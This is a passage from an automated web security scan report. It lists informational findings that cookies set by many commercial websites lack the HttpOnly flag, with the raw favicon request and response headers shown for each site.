14.169. http://www.pnc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pnc.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pnc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:18 GMT
Location: https://www.pnc.com/favicon.ico
Content-Length: 215
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_q*epuew-w0-mc*80=ffffffffa9c1271e45525d5f4f58455e445a4a422973;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.pnc.com/favicon.ico">here</a>.</p>

...[SNIP]...

14.170. http://www.potterybarn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.potterybarn.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.potterybarn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"1406-1301028802000"
Last-Modified: Fri, 25 Mar 2011 04:53:22 GMT
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8
Expires: Sat, 02 Apr 2011 13:56:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:56:58 GMT
Connection: close
Set-Cookie: PBDPWWW-EC=R4233321340; expires=Sun, 03-Apr-2011 14:02:10 GMT; domain=.potterybarn.com; path=/
Set-Cookie: WSPFY=179ed7406c5f00002a2b974dde5e000099500000; expires=Mon, 1-Jan-2024 00:00:01 GMT; path=/; domain=.potterybarn.com

...[SNIP]...

14.171. http://www.pricegrabber.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pricegrabber.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pricegrabber.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:28 GMT
Server: Apache/2.2
Set-Cookie: Apache=173.193.214.243.1301751568439706; path=/
Last-Modified: Thu, 30 Sep 2010 17:52:42 GMT
Accept-Ranges: bytes
Content-Length: 625
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR LAW ADM TAIi OUR DELi BUS PRE"
Content-Type: image/png

...[SNIP]...

14.172. http://www.progressive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.progressive.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.progressive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:02 GMT
Content-Type: image/x-icon
Content-Location: http://www.progressive.com/favicon.ico
Last-Modified: Mon, 14 Jul 2008 17:26:23 GMT
Accept-Ranges: bytes
ETag: "90e7f8bcd6e5c81:ca5"
Server: Microsoft-IIS/6.0
P3P: CP = "CUR ADM DEV TAI PSA PSD IVAo IVDo CONo OUR OTRo IND DSP COR CAO PHY ONL UNI PUR COM FIN NAV INT DEM CNT STA GOV OTC" policyref="http://www.progressive.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=e2d8848e783d41c387116140aecf48e2; path=/; domain=.progressive.com; expires=Sun, 31 Dec 2034 00:00:00 GMT
Set-Cookie: TLTSID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/
Set-Cookie: TLTHID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/
Set-Cookie: TLTUID=6E514838403FC7D968F3CB8A2A43E209; Domain=.progressive.com; path=/; expires=Sat, 02-04-2021 13:45:02 GMT
Content-Length: 10078

...[SNIP]...

14.173. http://www.purdue.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purdue.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.purdue.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:34 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 11 May 2009 18:19:03 GMT
ETag: "e802a-2fe-351f3c0"
Accept-Ranges: bytes
Content-Length: 766
Content-Type: image/x-icon
Set-Cookie: BIGipServerPool_old-PPWC_all=1729800384.0.0000; path=/

...[SNIP]...

14.174. http://www.qualityhealth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qualityhealth.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qualityhealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 22 Nov 2008 02:06:45 GMT
ETag: "57e-45c3d9d14f740"
Accept-Ranges: bytes
Content-Length: 1406
P3P: policyref="http://www.qualityhealth.com/p3p/p3p.xml", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:51:41 GMT
Connection: close
Set-Cookie: AKAMAIID=a4f3f748bb190000ed29974d961f070061ac0000; path=/; domain=www.qualityhealth.com

...[SNIP]...

14.175. http://www.qvc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qvc.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qvc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
Location: /favicon.ico?&cookie=set
Content-Length: 0
Expires: Sat, 02 Apr 2011 13:36:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:24 GMT
Connection: close
Set-Cookie: site=IIS; domain=.qvc.com; path=/; expires=04-Apr-2011 12:00:00 EST
Set-Cookie: dc=IIS; domain=.qvc.com; path=/
Set-Cookie: cae_browser=desktop; expires=Sat, 02-Apr-2011 15:36:24 GMT; path=/; domain=.qvc.com


14.176. http://www.qwest.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qwest.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qwest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:27 GMT
Server: Apache
Set-Cookie: TLTHID=362214305D2E105D003BFDF5C24DBE16; Path=/; Domain=.qwest.com
Set-Cookie: TLTSID=362214305D2E105D003BFDF5C24DBE16; Path=/; Domain=.qwest.com
Last-Modified: Mon, 30 Mar 2009 13:45:20 GMT
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

...[SNIP]...

14.177. http://www.regions.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.regions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402696235; path=/
Content-Length: 3262
Content-Type: image/x-icon
Last-Modified: Tue, 21 Dec 2010 20:53:21 GMT
Accept-Ranges: bytes
ETag: "16f4821a51a1cb1:83cf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:34:32 GMT

...[SNIP]...

14.178. http://www.reverbnation.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reverbnation.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.reverbnation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n Phusion_Passenger/3.0.4
Last-Modified: Fri, 29 Jan 2010 15:02:18 GMT
ETag: "47e-47e4eebf39280"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 13:40:42 GMT
Vary: Accept-Encoding
Content-Type: image/x-icon
Set-Cookie: BIGipServerCust15535_http_new=3567336261.20480.0000; path=/

...[SNIP]...

14.179. http://www.righthealth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.righthealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:00 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Wed, 30 Mar 2011 14:55:03 GMT
Accept-Ranges: bytes
Content-Length: 0
Cache-Control: max-age=14400
Expires: Sat, 02 Apr 2011 17:26:00 GMT
Content-Type: image/vnd.microsoft.icon
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sat, 02-Apr-2011 13:41:00 GMT;path=/


14.180. http://www.searchassist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.searchassist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.searchassist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: must-revalidate,no-cache,no-store
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=iso-8859-1
Server: Jetty(6.1.22)
Set-Cookie: AWSELB=2563B9B11EC8DD63A7D0066B27E680F281086BEFEBF9E88E0B9BA03C5D3EFB7E75B51AC65CF93C7D9695D6379942089DF4CAB7B8FAF475B2CC0D3E0F45F7C36B839009ECA9;MAX-AGE=60
Content-Length: 1376
Connection: keep-alive

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /favicon.ico. Reas
...[SNIP]...

14.181. http://www.sfgate.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sfgate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:14 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Set-Cookie: Apache=173.193.214.243.1301751794799394; path=/; max-age=31536000; domain=.sfgate.com
Last-Modified: Thu, 12 Aug 2004 16:20:01 GMT
ETag: "3e1a58-37e-3e17756a8640c"
Accept-Ranges: bytes
Content-Length: 894
Vary: Accept-Encoding
Content-Type: image/x-icon

..............h.......(....... ...........@.........................................................................................................................33.33.33.33.33.33.33.33.33.33.33.33.
...[SNIP]...

14.182. http://www.sharebuilder.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sharebuilder.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sharebuilder.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 120
Content-Type: text/html; charset=utf-8
Location: /
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=48060E2F4787FE63D9C25ABE8201A785; Path=/; Domain=.sharebuilder.com
Set-Cookie: TLTSID=48060E2F4787FE63D9C25ABE8201A785; Path=/; Domain=.sharebuilder.com
HostName: A110
Date: Sat, 02 Apr 2011 13:43:01 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f">here</a>.</h2>
</body></html>

14.183. http://www.shoebuy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoebuy.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shoebuy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 24 Sep 2008 05:15:33 GMT
ETag: "47e-5fa56740"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Expires: Sat, 02 Apr 2011 13:51:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:51:37 GMT
Connection: close
Set-Cookie: sb2=AAAAgU2XKekAACDvAwsZAg==; path=/; expires=Thu, 31-Mar-16 13:51:37 GMT
Set-Cookie: NSC_1-26STU9-qh10.101.208.14=ffffffff096d444b45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:06:37 GMT;path=/

............ .h.......(....... ..... ..............................................................................................................................}{..zw...............................
...[SNIP]...

14.184. http://www.shutterfly.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shutterfly.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shutterfly.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:24:59 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"2862-1172715710000"
Last-Modified: Thu, 01 Mar 2007 02:21:50 GMT
Content-Length: 2862
Set-Cookie: lb=0FEyVLc8-app224; Path=/
Set-Cookie: BIGipServerAPP-B-LR=1802571948.20480.0000; path=/
Content-Type: text/plain

..............(...6...........h...^......... .h.......(....... ................................................................................................."......n.`.f`...........................
...[SNIP]...

14.185. http://www.snapfish.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snapfish.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.snapfish.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:31 GMT
Server: Apache/2.2.3
Vary: Accept-Encoding
Content-Length: 283
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServersf3-scw-pod2=1913336330.16415.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<
...[SNIP]...

14.186. http://www.space.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.space.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.space.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:36 GMT
Last-Modified: Wed, 12 Jan 2011 18:34:49 GMT
ETag: "1ecab-e36-499aa74bee440"
Accept-Ranges: bytes
Content-Length: 3638
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TSf4ec54=d0677b7b7d61b86ff3a6c5f1eca230d7971b76fb1a1987004d972dd8; Path=/

..............h...&... ..............(....... ...........@...................................>>>.^^^.....................MMM.qqq.........333.(((.........hhh.UUU.........EEE.yyy.....................##
...[SNIP]...

14.187. http://www.staples.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.staples.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.staples.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
Content-Length: 14
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 02 Apr 2011 13:25:20 GMT
Connection: close
Set-Cookie: zipcode=20001; expires=Fri, 28-Mar-2031 13:25:20 GMT; path=/
ZipCodeDebug: Cookie=absent_BestGuess=present

File not found

14.188. http://www.straighttalk.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.straighttalk.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straighttalk.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Set-Cookie: STALKA=R360885800; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT
Date: Sat, 02 Apr 2011 13:41:09 GMT
Content-Length: 1214
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

14.189. http://www.suite101.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suite101.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.suite101.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:42 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 JRun/4.0
Last-Modified: Fri, 25 Jun 2010 21:13:03 GMT
ETag: "1f79678-47e-489e13c8775c0"
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-455a6255=455a6259:0; expires=Sat, 02-Apr-11 13:01:38 GMT; path=/

............ .h.......(....... ..... .........................................?...........9..C........*..{....+...............................V..'........O..d....U...(...    ...a.........................
...[SNIP]...

14.190. http://www.terra.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.terra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:41 GMT
Server: Apache
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1301753981.696717; path=/; expires=Fri, 01-Jan-2016 00:02:40 GMT; domain=.terra.com
Last-Modified: Tue, 05 Dec 2006 21:40:32 GMT
ETag: "1808f-14a6-423e250cc7400"
Accept-Ranges: bytes
Content-Length: 5286
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

..............h...6...........`....... ..............(....... ...........@.............................................................................................................................
...[SNIP]...

14.191. http://www.thefind.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefind.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefind.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:08 GMT
Server: Apache
Set-Cookie: flsid=6c696ac09826ae214b6b34932fd74779; path=/
Expires: Sat, 02 Apr 2011 12:53:08 GMT
Cache-Control: public, s-maxage=600, max-age=600
Last-Modified: Thu, 31 Mar 2011 05:45:57 GMT
Set-Cookie: fl-uid=c4b368f36983c5eb4b2448a842ace642%2C1%2C1301748188; expires=Sun, 01-Apr-2012 12:43:08 GMT; path=/; domain=.thefind.com
Content-Language: en
Status: 200 OK
Content-Length: 1406
Content-Type: image/x-icon; charset=utf-8

..............h.......(....... ........................................................................................................................................................................
...[SNIP]...

14.192. http://www.theglobeandmail.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theglobeandmail.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theglobeandmail.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.8
Content-Type: text/html; charset=UTF-8
P3P: policyref="http://www.theglobeandmail.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI COM NAV INT DEM STA PRE"
X-ServerName: Web4
Content-Length: 18520
Date: Sat, 02 Apr 2011 13:56:22 GMT
X-Varnish: 744761676 744759685
Age: 13
Via: 1.1 varnish
Connection: keep-alive
Set-Cookie: BIGipServerEceweb=402840586.20736.0000; path=/

<!doctype html>
<html lang="en-ca" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime();</script>
<link rel="stylesheet" type="tex
...[SNIP]...

14.193. http://www.thehollywoodgossip.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehollywoodgossip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: mut=173.193.214.243.1301751604816322; path=/; expires=Sat, 30-Apr-11 13:40:04 GMT; domain=.thehollywoodgossip.com
Last-Modified: Thu, 21 Jan 2010 21:11:14 GMT
ETag: "4105de-cbe-47db324a12080"
Accept-Ranges: bytes
Content-Length: 3262
Cache-Control: max-age=31536000
Expires: Sun, 01 Apr 2012 13:40:04 GMT
Vary: User-Agent
Connection: close
Content-Type: image/x-icon

...... ..............(... ...@...............................###..............................#)#......krgBQC......_fZ....................................###...............................&.......
...[SNIP]...

14.194. http://www.thinkquest.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thinkquest.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thinkquest.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0
ETag: "1f145c4-13e-4ce171f0"
Content-Type: image/x-icon
Last-Modified: Mon, 15 Nov 2010 17:46:24 GMT
Content-Length: 318
Date: Thu, 31 Mar 2011 10:40:06 GMT
Accept-Ranges: bytes
Set-Cookie: BIGipServerwww_thinkquest_org_80=1562219149.15108.0000; expires=Sat, 02-Apr-2011 21:46:10 GMT; path=/

..............(.......(....... .......................................??..__..............//..........OO.....................................}....{............=;..... ..-...................d....m...
...[SNIP]...

14.195. http://www.ticketmaster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketmaster.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

